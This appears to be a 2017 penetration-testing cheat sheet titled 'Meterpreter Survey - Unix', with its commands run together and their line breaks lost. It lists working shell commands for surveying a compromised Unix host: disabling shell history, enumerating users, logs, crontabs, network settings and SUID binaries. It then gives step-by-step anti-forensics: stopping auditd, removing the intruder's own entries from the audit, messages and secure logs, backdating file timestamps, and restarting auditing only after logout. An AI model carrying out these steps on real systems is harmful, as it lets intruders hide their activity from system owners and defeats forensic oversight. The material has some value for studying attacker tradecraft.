date: “2017-02-21” draft: false title: “Meterpreter Survey - Unix”
Init
- Situational Awareness
unset HISTFILEsu root# if neededunset HISTFILEdatedate +%sfind /var/log -type f -mmin -10 2> /dev/nullls -lart /var/logcat /etc/*syslog*.conf | grep -v "^#"service auditd status/sbin/chkconfig --listservice --status-allps -aefuname -acat /etc/*releasecat /etc/inittabwwho -alast -a -ilastloglastbuptimecat ~/.bash_history/sbin/lsmodvmstatcat /proc/cpuinfohostname/sbin/iptables -nL --line-numberscat /etc/resolv.conf/sbin/ifconfig -anetstat -antupps -aef
- Crontabs
for user in $(cut -f1 -d: /etc/passwd); do echo $user >> /tmp/crontabs; crontab -u $user -l >> /tmp/crontabs; donecat /tmp/crontabs | morerm -f /tmp/crontabsls -la /etc/cron*cat /etc/crontab
- Suspicious files
find / -type f -name ".*"# find hidden filesfind / -type d -name ".*"# find hidden directoriesfind / -user root –perm -4000 –print0 | xargs -0 ls -l# find SUID root executablesfind / -perm -2000 –print0 | xargs -0 ls -l# search SGID programs
Cleaning Logs
- Cleaning audit log
grep -n "<IP ADDR>" /var/log/audit/audit.logservice auditd stopwc -l /var/log/audit/audit.loghead -n <X>/var/log/audit/audit.log > /tmp/aud.log# <X> = line number before your entries startwc -l /tmp/aud.log# should be X linestail /tmp/aud.logdate -d @epoch time of last entrycat /tmp/aud.log > /var/log/audit/audit.logchmod 0600 /var/log/audit/audit.logtouch -t YYYYMMDDHHmm.ss /var/log/audit/audit.logls -al /var/log/audit/audit.logrm -f /tmp/aud.log
- Cleaning Messages log
grep -n "<IP ADDR>" /var/log/messageswc -l /var/log/messageshead -n X /var/log/messages > /tmp/msg.log# where X is the line number before your entries startwc -l /tmp/msg.log# should be X linestail /tmp/msg.logcat /tmp/msg.log > /var/log/messageschmod 0600 /var/log/messagestouch -t YYYYMMDDHHmm.ss /var/log/messagesls -al /var/log/messagesrm -f /tmp/msg.log
- Cleaning /var/log/secure
grep "sshd\[<PID>\]" /var/log/securegrep -v "sshd\[<PID>\]" /var/log/secure > /tmp/secure.logtail /tmp/secure.logcat /tmp/secure.log > /var/log/securetail -3 /var/log/securetouch -t YYYYMMDDHHmm.ss /var/log/securerm -rf /tmp/secure.log
Cleanup
- Delete any tmp files you created
ls -l /tmprm -f /tmp/*.log
- Restart auditd after you logout
echo -e '#!/bin/sh\nsleep 30\nfunction d {\nservice auditd start && rm -rf /tmp/X-unix\n}\ntrap d EXIT' > X-unixchmod 755 X-unixcat X-unix./X-unix&